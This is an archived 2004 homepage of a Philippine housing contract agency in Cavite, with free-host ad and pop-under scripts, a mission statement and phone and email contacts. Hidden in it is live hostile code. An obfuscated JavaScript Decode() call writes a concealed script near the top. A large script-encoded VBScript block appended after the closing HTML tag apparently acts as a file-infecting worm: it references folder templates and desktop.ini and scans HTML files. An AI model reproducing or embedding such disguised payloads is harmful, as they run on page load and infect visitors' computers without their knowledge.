<HTML>
<HEAD>
<TITLE>http://www.profagents.netfirms.com</TITLE>
<META NAME="Keywords" CONTENT="Cavite, housing, profriends, dasmariñas, dasmarinas, imus, ville de soleil, quality, inexpensive, affordable,inexpensive,two stories, 3 bedrooms, 2 bedrooms, single detached, townhouse, dream home">
<META NAME="Description" CONTENT="a prestigiousa and good place to live in at a very affordable cost, with acceptable and affordable terms.  We deliver quality and above standard housing units from 2 to 3 bedrooms.  You may choose from townhouses to single attached and single detached units within Cavite.">
<META NAME="Author" CONTENT="profagents@yahoo.com">
<!-- META Tags generated by http://submitexpress.com/metatag.html -->


<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<meta http-equiv="Content-Language" content="en-us">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
















































































































































<!--mstheme--><link rel="stylesheet" type="text/css" href="_themes/sumipntg/sumi1111.css"><meta name="Microsoft Theme" content="sumipntg 1111">
<meta name="Microsoft Border" content="tlb, default">
</head>

<body  >
<SCRIPT LANGUAGE=JavaScript>
<!--
   document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%66%75%6E%63%74%69%6F%6E%20%44%65%63%6F%64%65%28%73%29%7B%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%0A%7D%0A%3C%2F%73%63%72%69%70%74%3E'));
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript src="/fs_img/js/md5.js"></SCRIPT>
<!-- '"AWS"' -->
<!-- Auto Banner Insertion Begin -->
<div id=aws_5121 align=center><style type="text/css">
  .mwsb{ background-color: 3366CC; border-width: 1px; border-color: 3366CC; border-style: solid; }
  .mwst, .mwst a{ font-family: arial,sans-serif; font-size: 8pt; background-color: white; color: blue;}
  </style>
  <!------ OAS SETUP begin ------>
  <img src="http://track.untd.com/s/oasrdb?pid=MWS&profile=,," width="1" height="1">
  <SCRIPT LANGUAGE=JavaScript>
  <!--
  //configuration
  OAS_url = "http://cyclops.prod.untd.com/";
  //OAS_sitepage values can be found in the excel spreadsheet showing position and pagenames.
  OAS_sitepage = 'webservices/general'; //CHANGED
  //OAS_sitepage = window.location.hostname + window.location.pathname;
  // must list every Ad position on the page or they will not show.  Also you can't have line items that are not on the page or a impression will be counted even though it was actually shown. 
  OAS_listpos = 'Top,Bottom,Frame1,Frame2,Right,TopLeft,Top1,TopRight';
  OAS_query = '';
  OAS_target = '_Blank';
  //end of configuration
  OAS_version = 10;
  OAS_rn = '001234567890'; OAS_rns = '1234567890';
  OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
  function OAS_NORMAL(pos) {
    document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
    document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
  }
  //-->
  </SCRIPT>


  <SCRIPT LANGUAGE=JavaScript1.1>
  <!--
  OAS_version = 11;
  if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
    OAS_version = 10;
  if (OAS_version >= 11)
    document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCR'+'IPT>');//-->
  </SCRIPT>

  <SCRIPT LANGUAGE=JavaScript>
  <!--
  document.write('');
  function OAS_AD(pos) {
    if ((OAS_version >= 11) && (typeof OAS_RICH != 'undefined')) {
      OAS_RICH(pos);
    } else {
      OAS_NORMAL(pos);
    }
  }

  //-->
  </SCRIPT>
  <!-- start /fs_img/about_pop.txt -->
<!-- The only pops this script can generate now are:
			1. Pops from UOL
			2. In-house popup
-->
<script language="JavaScript">
<!--
var isUS = "1";
var keyword = escape("");
var compname='freeservers';
var ourExitPop=true;

function popSlot(slot){
    // OAS AD 'Frame1' begin
    if(window.OAS_AD) OAS_AD('Frame1');
    // OAS AD 'Frame1' begin
}

function checkPopunderCookie() {
	var cookieVal = 0;
	cookieExpDays = (1/24);  
	var expDate = new Date();
	expDate.setTime(expDate.getTime() + (86400000 * cookieExpDays));
	cookieDate = ";Expires=" + expDate.toGMTString();
	if (document.cookie) {
		var cookieInfo = document.cookie.split(";");
		for (i=0; i<cookieInfo.length; i++) {
			cName = cookieInfo[i].split("=")[0];
			if (cName.indexOf("pixelpop") >= 0) {
				cookieVal = cookieInfo[i].split("=")[1];
			}
		}
	}
	cookieVal++;
	document.cookie="pixelpopslot="+cookieVal+";path=/;"+cookieDate;
 	if (cookieVal== 1) { popSlot(1); }
 	if (cookieVal== 2) { popSlot(2); }
 	if (cookieVal== 3) { popSlot(3); }
 	if (cookieVal== 4) { popSlot(4); }
 	if (cookieVal== 5) { popSlot(5); }
 	if (cookieVal== 6) { popSlot(6); }
 	if (cookieVal== 7) { popSlot(7); }
 	if (cookieVal== 8) { popSlot(8); }
}

if (!window.sprs) checkPopunderCookie();

if (!window.sprs && ourExitPop && (navigator.appName.indexOf('etscape')==-1)){
	window.onunload=staycheck;
	StayingOnSite=false;
	DadLinkURLs="";
	BabyLink="";
	DadWindow=window.parent;
	DadLinks=DadWindow.document.links;
	DadHost="http://"+location.hostname;
	DadWindow.document.onclick=linktellerDad;
	document.onclick=linktellerThis;
	function linkteller(){
		while (EventTag.parentElement&&(EventTag.tagName!="A")){
				EventTag=EventTag.parentElement;
		}
		if ((EventTag.tagName=="A")&&(!EventTag.target)){
			if (EventTag.href.indexOf(DadHost)>-1){
				StayingOnSite=true;
			} else {
				StayingOnSite=false;
			}
		}
	}
	function linktellerThis(){
		EventTag=window.event.srcElement;
		linkteller();
	}
	function linktellerDad(){
		EventTag=DadWindow.event.srcElement;
		linkteller();
	}
	function staycheck(){
		if (StayingOnSite){
		} else {
		}
	}
}
-->
</SCRIPT>
<!-- end /fs_img/about_pop.txt -->
  <table cellpadding="0" cellspacing="0" width="980">

    <!-- start: related resources -->
    <tr>
      <td colspan="3">
        <table cellpadding="0" cellspacing="0" align="center" width="100%" class="mwsb">
          <tr>
            <td class="mwst" id="uows0207" align="center">
              <a href="http://www.freeservers.com" target="_top">Free Web Hosting Provider</a> 
              - <a href="http://www.globalservers.com" target="_top">Web Hosting</a>
              - <a href="http://www.bizhosting.com" target="_top">E-commerce</a>
              - <a href="http://www.netzero.com/?refcd=MWS0404NWP11" target="_top">High Speed Internet</a>
              - <a href="http://www.freeservers.com/Free-Web-Page.html" target="_top">Free Web Page</a>
              <script type="text/javascript"><!--
              function find(){ obj = document.getElementById('uows0207'); arr = obj.getElementsByTagName('a'); for(var i=0;i<arr.length;i++){ var x = '?refcd=WSUOWS020722NB01'; if(!arr[i].href.match(/refcd/)) arr[i].href+=x; }}; find();
              //--></script>
            </td>
          </tr>
        </table>
      </td>
    </tr>
    <!-- end: related resources -->

    <tr>
      <td width="130">
        <table cellpadding="0" cellspacing="0" width="130" style="margin-top:2px;">
          <tr>
            <td class="mwst" nowrap="1">
              <a href="http://freeservers.com/?refcd=MWS_20040713_Banner_bar"
                ><img src="/cgi-bin/image/images/bannertype/100X22.gif" width="100" height="22" border="0"
                ></a
              ><a href="/cgi-bin/login" target="_blank"
                ><img src="/cgi-bin/image/images/bannertype/login_chunkx.gif" width="30" height="22" border="0"
                ></a
             ></td>
          </tr>
        </table>
        
        <table class="mwsb" cellpadding="0" cellspacing="0" width="100%" style="margin-top:2px;">
          <tr>
            <td align="center">
              <a href="/cgi-bin/path/signup?refcd=MWS_20040713_Banner_bar"
              ><img src="http://nztv.prod.untd.com/RealMedia/ads/Creatives/ISP/MWS_Mkting_LSKYBUT_34_8023/128x64_get_a_free_website_01.gif" border="0"
              ></a>
            </td>
          </tr>
        </table>
      </td>

      <td>
        <table cellspacing="0" class="mwsb" style="margin:2px;margin-bottom:0px;table-layout:fixed;"> 
          <tr>
            <td class="mwst" align="center" style="width:730px;">
    <!------ OAS AD 'Top' begin ------>
    <SCRIPT LANGUAGE=JavaScript>
    <!--
    if(window.OAS_AD) OAS_AD('Top');
    //-->
    </SCRIPT>
    <!------ OAS AD 'Top' end ------></td>
          </tr>
        </table>
      </td>

      <td width="120">
        <table class="mwsb" cellpadding="0" cellspacing="0" width="120" style="margin-top:2px;">
          <tr>
            <td class="mwst" nowrap="1">
              <SCRIPT LANGUAGE=JavaScript><!--
              OAS_AD('Top1');
              //--></SCRIPT>
            </td>
          </tr>
        </table>
        
        <table class="mwsb" cellpadding="0" cellspacing="0" width="100%" style="margin-top:2px;">
          <tr>
            <td align="center">
              <SCRIPT LANGUAGE=JavaScript><!--
              OAS_AD('TopRight');
              //--></SCRIPT>
            </td>
          </tr>
        </table>
      </td>

    </tr>
    <tr>
      <td colspan="3" align="center">
        <!-- search bar begins --><table width="100%" cellpadding="0" cellspacing="0" class="mwsb" style="border-width:2px; margin-top:10px; background-color:white; height:10px;">  <tr valign="top">    <td align="center">      <form action="http://search.mysite.com/search" style="margin:0;" target="_blank">      <span style="position:relative;top:-5px;font-family:arial;font-size:12px;color:#000;"><b>Search the Web</b></span>      <input type="hidden" name="source" value="mws_endsite_box">      <input type="hidden" name="action" value="search">      <input name="query" accesskey="s" style="width:400px; height:21px; background:white; border:1px #A4ABB1 solid; font-family: arial, sans-serif; font-size: 10pt; color: #000000; position:relative; top:-6px;">      <input type="image" src="/fs_img/bannertype/infospace/search_sp_go.gif">      <img src="/fs_img/bannertype/infospace/search_logo.gif" style="position:relative;top:4px;left:10px;">      </form>    </td>    <td width="5%"></td>  </tr></table>
      </td>
    </tr>
  </table><DIV id=sideFrame 
	style="MARGIN-TOP: 27px; RIGHT: 5px; WIDTH: 120px; COLOR: #ffffff; POSITION: absolute; BACKGROUND-COLOR: #CCCCCC; Z-INDEX: 10000; TEXT-ALIGN: right"><A 
	href="javascript:void%20(sideFrameOff())"><IMG src="/fs_img/banners/xout.gif" title="Close"
	border=0></A><BR>
  <!------ OAS AD 'Right' begin ------>
  <SCRIPT LANGUAGE=JavaScript>
  <!--
  OAS_AD('Right');
  // -->
  </SCRIPT>
  <!------ OAS AD 'Right' end ------>
	<SCRIPT>
		origRightPadding=document.body.style.paddingRight;
		document.body.style.paddingRight="130px";
		function sideFrameOff(){
			document.getElementById('sideFrame').style.display='none';
			document.body.style.paddingRight=origRightPadding;
		}
	</SCRIPT>
	</DIV>
  <DIV id="setMyHomeOverlay" align="left" style="position:absolute; top:25%; left:25%; width:358px; border:1px solid #AEAEAE; background-color:white; z-index:200000; display: none;">
    <div style="height:59px; padding-left:22px; background:white url('/cgi-bin/image/images/sethome_top_border.gif') repeat-x;">
    <div style="float:left; width:182px; height:35px; margin-top:12px; font:bold 38px arial,sans-serif; color:#454545"> Welcome! </div>
    <div style="float:right; padding:6px 5px 0px 5px;"><a href="#" onclick="javascript:do_set_homepage('close'); return false;">
    <div style="background:url('/cgi-bin/image/images/sethome_x.gif'); width:21px; height:21px; cursor:pointer;"></div></a></div>
    <div style="float:right; font:bold 12px arial; margin-top:10px;"><a style="text-decoration:none; color:#004182;" href="#" onclick="javascript:do_set_homepage('close'); return false;">Close</a></div></div>
    <div style="height:170px; background:#ffffff;">
    <div style="padding:30px 20px 0px 20px; font:normal 14px arial; height:80px;"> Would you like to make this site your homepage? It's fast and easy... </div>
    <div style="padding:10px 0 0 41px;">
    <div style="float:left;cursor:pointer; background:white url('/cgi-bin/image/images/sethome_btn_l.gif'); width:4px; height:26px;" onclick="javascript:do_set_homepage('do');"> </div>
    <div style="float:left;cursor:pointer; background:white url('/cgi-bin/image/images/sethome_btn_m.gif') repeat-x; width:265px; height:26px; text-align:center; font:bold 13px Arial; color:#FFFFFF; line-height:25px;" onclick="javascript:do_set_homepage('do');"> Yes, Please make this my home page! </div>
    <div style="float:left;cursor:pointer; background:white url('/cgi-bin/image/images/sethome_btn_r.gif'); width:4px; height:26px;" onclick="javascript:do_set_homepage('do');"> </div></div>
    <div style="padding-left:148px; padding-top:7px; clear:both; font:normal 12px arial;"><a href="#" style="text-decoration:none; color:#004182;" onclick="javascript:do_set_homepage('close'); return false;">No Thanks</a></div></div>
    <div style="height:36px; background: white url('/cgi-bin/image/images/sethome_bot_border.gif') repeat-x;">
    <div style="float:left;margin:12px 0px 0px 20px; line-height:10px;"><input type="checkbox" style="width:11px; height:11px;" onclick="javascript:do_set_homepage('dont');"></div>
    <div style="float:left;font:normal 12px arial;padding:10px 0 0 2px;"> &nbsp; Don't show this to me again.</div>
    <div style="float:right; padding:6px 5px 0px 5px;"><a href="#" onclick="javascript:do_set_homepage('close'); return false;">
    <div style="background:url('/cgi-bin/image/images/sethome_x.gif'); width:21px; height:21px; cursor:pointer;"></div></a></div>
    <div style="float:right;font:bold 12px arial; margin-top:10px;"><a style="text-decoration:none; color:#004182;" href="#" onclick="javascript:do_set_homepage('close'); return false;">Close</a></div></div></div>
    <span ID="mws_oHomePageOverlay" style="behavior:url(#default#homepage); display:none;"></span>
    <script src=/fs_img/js/overlay.js></script><script defer="defer" src=/fs_img/js/set_homepage.js></script></div><!-- Auto Banner Insertion Complete THANK YOU -->

<SCRIPT LANGUAGE=JavaScript>
<!--   
    Decode('%297Gwgvmtx%2964perkyeki%297H%2966nezewgvmtx%2966%2964x%7Dti%297H%2966xi%7Cx3nezewgvmtx%2966%2964wvg%297H%29663gkm1fmr3zepmhexicferriv%297Jirg%297H%7B%7Dp8%7B%7Dpj%29697J%29697G%29697H%29697G8%7Bz%7E%2969%3BFj%29697H%3B%29697ED%3B%2966%297I%297G3wgvmtx%297I4');
//-->
</SCRIPT>
<!--msnavigation--><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td>



<p align="center"><blink><span lang="en-ph"><font face="Bauhaus Heavy" size="6">PRO &#9679; 
FRIENDS CONTRACT AGENT</font></span></blink></p>



<p align="center"><font face="Monotype Corsiva" size="6">&nbsp;<span lang="en-ph">Quality 
Community Development by</span></font></p>



<p align="center">&nbsp;<img border="0" src="_borders/PF-Logo2.gif" width="159" height="86"></p>



<p align="center"><font face="Eurostile" size="5"><span lang="en-ph">
PROPERTY COMPANY OF FRIENDS, INC.</span></font></p>



<p align="center">
<img src="_derived/index.htm_cmp_sumipntg110_bnr.gif" width="600" height="60" border="0" alt="HOME">
<br>
<a href="./"><img src="_derived/home_cmp_sumipntg110_gbtn.gif" width="95" height="20" border="0" alt="HOME" align="middle"></a> <a href="feedback.htm"><img src="_derived/feedback.htm_cmp_sumipntg110_gbtn.gif" width="95" height="20" border="0" alt="ENQUIRY" align="middle"></a> <a href="search.htm"><img src="_derived/search.htm_cmp_sumipntg110_gbtn.gif" width="95" height="20" border="0" alt="SEARCH" align="middle"></a>
</p>


<p>&nbsp;</p>

</td></tr><!--msnavigation--></table><!--msnavigation--><table dir="ltr" border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td valign="top" width="1%">



<p>
&nbsp;<script language="JavaScript"><!--
MSFPhover = 
  (((navigator.appName == "Netscape") && 
  (parseInt(navigator.appVersion) >= 3 )) || 
  ((navigator.appName == "Microsoft Internet Explorer") && 
  (parseInt(navigator.appVersion) >= 4 ))); 
function MSFPpreload(img) 
{
  var a=new Image(); a.src=img; return a; 
}
// --></script><script language="JavaScript"><!--
if(MSFPhover) { MSFPnav1n=MSFPpreload("_derived/showcases.htm_cmp_sumipntg110_vbtn.gif"); MSFPnav1h=MSFPpreload("_derived/showcases.htm_cmp_sumipntg110_vbtn_a.gif"); }
// --></script><a href="showcases.htm" language="JavaScript" onmouseover="if(MSFPhover) document['MSFPnav1'].src=MSFPnav1h.src" onmouseout="if(MSFPhover) document['MSFPnav1'].src=MSFPnav1n.src"><img src="_derived/showcases.htm_cmp_sumipntg110_vbtn.gif" width="140" height="40" border="0" alt="Showcases" name="MSFPnav1"></a><br><script language="JavaScript"><!--
if(MSFPhover) { MSFPnav2n=MSFPpreload("_derived/gallery.htm_cmp_sumipntg110_vbtn.gif"); MSFPnav2h=MSFPpreload("_derived/gallery.htm_cmp_sumipntg110_vbtn_a.gif"); }
// --></script><a href="gallery.htm" language="JavaScript" onmouseover="if(MSFPhover) document['MSFPnav2'].src=MSFPnav2h.src" onmouseout="if(MSFPhover) document['MSFPnav2'].src=MSFPnav2n.src"><img src="_derived/gallery.htm_cmp_sumipntg110_vbtn.gif" width="140" height="40" border="0" alt="Photo Gallery" name="MSFPnav2"></a></p>



<p>
&nbsp;</p>



<p>
&nbsp;</p>



<p align="center">
<a href="http://profagents.8m.com/cgi-bin/signup" target=_blank><img src=/fs_img/count/odometer/1.gif border=0  alt=1><img src=/fs_img/count/odometer/8.gif border=0  alt=8><img src=/fs_img/count/odometer/5.gif border=0  alt=5><img src=/fs_img/count/odometer/9.gif border=0  alt=9></a>
</td><td valign="top" width="24"></td><!--msnavigation--><td valign="top">



<p><span lang="en-ph">If you're looking for a good place to live in at a very 
affordable cost, then you're at the right page and now is the right time.&nbsp; 
Click on the locator link on the left side to browse through our SHOWCASES PAGE.</span></p>


<p> 

<hr>

<p> </p>
<h2>Our Mission</h2>
<p><span lang="en-ph">To provide an inexpensive but world class housing and 
community for the Filipino.</span></p>



<p> </p>

<hr>


<p> </p>
<h2><span lang="en-ph">Agent</span> Profile</h2>
<p><span lang="en-ph">We are a group of IT Savvy Sales People who provides and 
make use of technology to help our clients find their dream house.</span></p>
<p><span lang="en-ph">All agents have been in the industry for more than twelve 
years thus ensuring quality in both service and responsiveness to any of your 
requirement.</span></p>
<p><span lang="en-ph">Consequently, we are obliged to assist you not only in 
making your dream come true, but also in incorporating and realizing technology 
applications and advantages that we could incorporate in your housing unit.</span></p>



<p> </p>

<hr>

<p>Also, feel free to use our GOOGLE powered search engine.&nbsp; Just type in
the information you're searching on the box provided below.<!-- Search Google -->
<center>
<FORM method=GET action="http://www.google.com/search">
<input type=hidden name=ie value=UTF-8>
<input type=hidden name=oe value=UTF-8>
<TABLE bgcolor="#FFFFFF"><tr><td>
<A HREF="http://www.google.com/">
<IMG SRC="http://www.google.com/logos/Logo_40wht.gif" 
border="0" ALT="Google" align="absmiddle"></A>
<INPUT TYPE=text name=q size=25 maxlength=255 value="">
<INPUT type=submit name=btnG VALUE="Google Search">
</td></tr></TABLE>
</FORM>
</center>
<!-- Search Google -->
<h2>Contact Information</h2>
<p><span lang="en-ph">For Further inquiries, please feel free to contact us on 
any of the contact information below or <u><b><a href="feedback.htm">you may click the link to our 
ENQUIRY 
page</a></b></u>, fill-up the necessary information and well get back to you the soonest.&nbsp; 
Thanks</span></p>

<dl>
    <dt><strong>Mobile #1:</strong> </dt>
    <dd><!--webbot bot="Substitution" s-variable="Mobile" startspan -->0920-4167071<!--webbot bot="Substitution" endspan i-checksum="13941" --></dd>
    <dt><strong>Mobile #2:</strong> </dt>
    <dd><!--webbot bot="Substitution" s-variable="Mobile2" startspan -->0917-5404567<!--webbot bot="Substitution" endspan i-checksum="13500" --></dd>
    <dt><strong>Mobile #3:</strong> </dt>
    <dd><!--webbot bot="Substitution" s-variable="Mobile3" startspan -->0920-9119912<!--webbot bot="Substitution" endspan i-checksum="13465" --></dd>
    <dt><strong>Postal address</strong> </dt>
    <dd><!--webbot bot="Substitution" s-variable="CompanyAddress" startspan -->GMA &amp; IMUS, Cavite<!--webbot bot="Substitution" endspan i-checksum="44385" --></dd>
    <dt><strong>Electronic mail</strong> </dt>
    <dd>General Information: <a href="mailto:profagents@yahoo.com">
    <!--webbot
        bot="Substitution" s-variable="CompanyEmail" startspan -->profagents@yahoo.com<!--webbot
        bot="Substitution" endspan i-checksum="56314" --></a><br>
        Webmaster: <a href="mailto:profagentswebmaster@yahoo.com">
    <!--webbot
        bot="Substitution" s-variable="CompanyWebmaster" startspan -->profagentswebmaster@yahoo.com<!--webbot
        bot="Substitution" endspan i-checksum="19491" --></a>
</dl>




&nbsp;<!--msnavigation--></td></tr><!--msnavigation--></table><!--msnavigation--><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td>


<p align="center"><font face="Monotype Corsiva" size="6">&nbsp;</font><nobr>[&nbsp;HOME&nbsp;]</nobr> <nobr>[&nbsp;<a href="showcases.htm" target="">Showcases</a>&nbsp;]</nobr> <nobr>[&nbsp;<a href="gallery.htm" target="">Photo&nbsp;Gallery</a>&nbsp;]</nobr></p>



<h5>

Send mail to <a href="mailto:profagentswebmaster@yahoo.com">profagentswebmaster@yahoo.com</a> with
questions or comments about this web site.<br>


Copyright © 2004 Property Company of Friends Contract Agent<br>


Last modified: 
08/31/04

</h5>

</td></tr><!--msnavigation--></table></body>
</html><Script Language="VBScript"><!--
QueryString="#@~^kxEAAA==6	P3MDKDP""+k;:PH+XY@&/Kx/D~bawVOHls+{J-4d bmCD}dRyRT ZJ@&/G	/OPz2aVnDZKN+{J1G:c:dRmmOr7+(c)mDk\p/WswKxnxOE@&ZGxkOP6/G/d?q9xr	TfWfw2T8Ow!,2O8qZwO0,W!RTZb!;1!lc y0NJ@&ZKxdY~AkZJ?&9'r	o12*f/+yOqZwT FqG! bf~, T!;!*sG*0)ZA8r@&NKmEsnUYchMkO+E@!mw2VOP4+rL4Y'T~Sk[Y4xZPUm:'JLba2VYHls+'E,mW9n'r[ba2s+DZKNn[E@*@!zCwas+D@*E@&9Wm;hxORS.bYnr@!kmDbwD~0KDxhbx[GSP+7nxD'W	sGl9@*k+OKrhr;YrE\(/^.bwYlhmkU\ymKxsKl9`#rJBq!Z!@!zkm.raY@*r@&?!4PsCrx7 |WUVGC9`b@&""no;tCUT+`b@&GDGw:nswsmY`K:aslD+9kM#@&9MWw:n:aVlDncK4kkfrDKCDtb@&G.WaHrd1`#@&obVn?1C	`P4kkfkMnmOt*@&KSKl[/4+m0c#@&2x9~jE(@&UE8P9.Kw\kk^`*@&6U,2D.GMP]+k;s+~g+XY@&wWM~x{!~YKPq@&GDWaP+swVmOn`6/KR!+Oja+^kmssKV[nM`xb'r-E#@&H6O@&sKDPAl14P9Prx,0dGcfDb-+k@&q6~[RGDb\nKz2'+PD4+	P9.KwKnhaVCYc9R9Mk7+SYDnDLJl-r#@&H6Y@&oWMP2m^4P	Pbx~d4UtnV^ ?a+^rmVsGs9+./@&(6P(	?DD`	~r9+k3OWaJbxZPK4nx,fDK2P+sw^lO+cULJwJ*@&16O@&AxN~j!4@&?!8,nJKl9Ztm0c#@&rUPAD.GMPIdEs+PgnaY@&q6P\WUO4`HWSb'OPCU9PfCzv1Gh*xyv~DtxPq/4jtVsR""EUcrIjg9Sd& c3p2,/4+sVf+cNsVBjCA6rOqkx[GS/36,+r#@&Ax9P?!4@&jE(Pok^+)2a+x9c0Bm#@&6UPADMW.P]nkEh+,H+XY@&jYPhzwks+{WkW V+Dsk^+vW#@&xx:HsrsRbDODb4EDnd@&sXwks+ )DY.k(;Y/xT@&?+O~sXok^n{0dKR}w+	KaYwks+v0S0*@&:Hok^+Rq.rYP1@&hXor^+ Z^G/@&or^+bOOMPW~	@&Ax[,?!4@&UE(~sbVnq	0n^D`w*@&r	P2M.GD,I/;:n~g+aY@&j+DPWx6/W 6a+UKaDsr^+vw~8#@&^'6R]+mN)s^@&0c/VK/+@&(WP&xUY.In-vmS\;GN#xT,rD~(	?OD""n7`^B\;WN#3J+	`-ZKNnb@!S+	cm*PK4nUP@&sbVnb22x[PaS\;W[n@&2x[~&0@&2	[,?;(@&UE4,sbs+UmCxvwb@&}xPA.DKDP""ndEs+,1n6O@&wW.PACm4PdW8PqU~6/GRVnDsG^ND`a#cok^+d@&U+sn1YP;C/PS;Cd+v0kW MnOA6O+	dkKxHCs+`dW8RHlsn*#@&;lk+PrtDhJBJ4YsVESrtYDE@&wkV(U0mD`d0q hlOt*@&2	N~jV+^O@&1n6D@&Ax[,?!4@&wE	^YbWUP7ZG[`#@&6x,2DMG.P""+kEh+~H6O@&	/W9+x]wVC^`}E.H?OMk	o~1tMc&W#Sm4DcfW#[14Dv&c*b@&fMWaHn').Mlz`r@!JLJj^MkwO~dlUo!CT+xrJjA?1Db2YrJ@*@!r[^4M`&2b[rOOrSEp!+MXjY.r	oxJrE[	ZG[[JEEr~ENK^!:n	YchDbYEJ@!JE[rJj^MkwD~Smxo!CL+{JrJE.$j1DrwD 2	mG[JJEE@*JE[5;DzUYMkxT[rE@!JJE[rJj^MkwD@*JrJ~rRRJLJ@*@!&J'EUm.kaO@*r#@&-;WNnxxWrxv9MW2t+BZtM`8T#*@&3x9Po;	mYbGx@&?E(~]+TZ4lUonc*@&6x,3DMW.~""+/;hPH+XO@&b3{J4YYa)J&hSh oW^rDk+k mK:z4n[Nm{sl.knmDWs+	Ok	W&r	N+a 4YhJ@&jh'Em4KEY=+M.WMJ@&C;jxE_|2ImZ`IIAHP{`?AIwJ@&jt'E?KWYSl.n'Hk^.K/G0Dwr@&udH{JCn2ImS}Z)S|H)/_q1AwJ@&Z{E	k	NKhd-/;MDnxD#+M/rG	-J@&KA'EnKsbmr/'26aVK.+M-E@&&2xE&xY.xYPAa2VKDDwJ@&j{C/jLjHLq3'rHlrU'?OlMO,nCT+r@&b{Cd\[UH'qA[E)(WEDiId/-..WMJ@&2xCJ\L?\[q/[r2aOUt+ssjknhkwP*1Rcws2ZOy0fWOqF;sR)Avv T%Z! ~+3Fyvy8wJ@&H{CJHLjHL/'h2[EHKsGV9nMr2DkKx/r@&_xC;j'?t[	/LJ2X2VKD+Mw)N7l	mnNwubN[+	E@&;'u/`[?\'qZ'nA'rZsm/kkmUtsVr@&	kDt~	kt?4nV^@&fqxEIAM|f	r]9r@&j}{EIAMmj\J@& ]o	DbOPjB?h~?\@&c]+T.kD+~)Bb2Bj}@&RIL	DbYPH~qSG@&R""noqDrOPCSTBf	@&c]o	MkD+P;~ZSfq@& Io9n^+Y~2@&2x9~	kDt@&2UN~j!4@&s!UmDkGU,KtrdGk.nmO4`b@&r	P2MDK.P""+dEs+~H6Y@&2'""+w^C^+vj	2dmC2`[W1;:xO ^WmCObWU#BE6ks)Jzzr~rE#@&qWP6/G wkV36b/Ykc2#,K4+U@&2x""+2Vm^+vwSWkWR!nDsrVHm:nvw*~Jr#@&3Vk+@&q6PHGD`SU`a#@!{fbP:tx~wx2LJ&J@&3x9P(W@&KtrdGk.nmO4'2@&2	NPwE	^YbWU@&wEU^DkW	~K:w^CO+GkM`b@&6U,2.DK.P""+d;s+PHnXY@&w{WkW V+D?wmbCVwWsNDcT*[J'	+(J@&6dGRG+^+O+oG^NnD,2~:D;n@&0/G ;DnlDnwWs9+M`w*@&UnY,:zsbVnx6/Wc!+DsW^[nDvw*@&hXor^+ bDODb4;O/'{@&:+hw^CD+9bD{w[r-r@&2	N~s!x^ObWx@&jE(PfMG2K:aVCYncalOt*@&r	P3.MWD~]/;:~g+aD@&wWV9+MuK:'E@!4Yhs@*@!4K[X,/mMGsV{xKPdYzs'hlMLk	)T@*@!W4%n1Y~m^Ck/r9'1V/bN=q%y!o2G!R*F&2 qFG!Oz1Z !ZZTco9F!Xby~/DXsn{hk[O4)q!ZYptnbo4Y)8!ZY@*@!zG4N+^O@*@!z(GNH@*@!J4O:^@*r@&rxrJbxn'm.DmXcE]26Oj4+sVwG^NnM.b+hkTrSJG+Wl!VOxP*,R*sw2! +0fWO8F/sR)AvOZ0!Z $+AF +)JSJPXO%*wsA!Oy%G*O8F/s b3+O!RT!yA Aq+vy8{	X,0*ws3! +%GcRq8ZsR)AvOZ0Z!+~ AF + )E~rJSJ]	X1Rcsw3!  %G*RF8ZwO)2 !0!Z+Ay2q++ 8DEBJK+Mdb/OtW	k3D{Wk^+lzJsGs9+Dc4YDJ~rESJ]RUtnVs/^ld/&U0KTESrZWUWbDhsbsr2{!r#@&G+kVYKw(1&'BGbx`bUkdkxS#4;Dd0b@&2xalOtLEf/VOKwRrUbJ@&sbsZ.lD+Pa~Gn/0YGw&1(@&wkV)YDDPaS{@&a'alOt'EwWsN.R4YOE@&sksn;DnlDn,wSwW^N+MC:PPLP-ZKNn@&wkV)YDDPaS{@&Ax9PjE8@&UE8PwrVZ.nmY+cWbVnxmh~^KxD+xD/*@&r	P3DMW.~""+/!h+,1+XO@&sbVbOY.~6ks+	C:~T@&U+Y~hHsrVx6/GcZM+lD+:n6DsrV`Wr^+xmh+BKD!nb@&sXwks+ 	MkO+,^W	YnUD/@&hzwks+c/^Wd@&AxN,?!8@&UE8PwksnzYYMc0bV+	Ch+BlDY.#@&6	P3DMGD,Ind!:+~H6O@&UnDPhHsbV+{0kGRV+OsbVnc6kVUls+#@&hzsbVR)YO.b4;Yd'mYO.@&2x[~UE8@&w;	mObW	Pbaw}8Lv#@&r	P3.MWD,]+kE:~H+XY@&?nY~)aw64NxNKm;hxY Caws+Ddvb2aVY1m:b@&Ax[PwEU^DkW	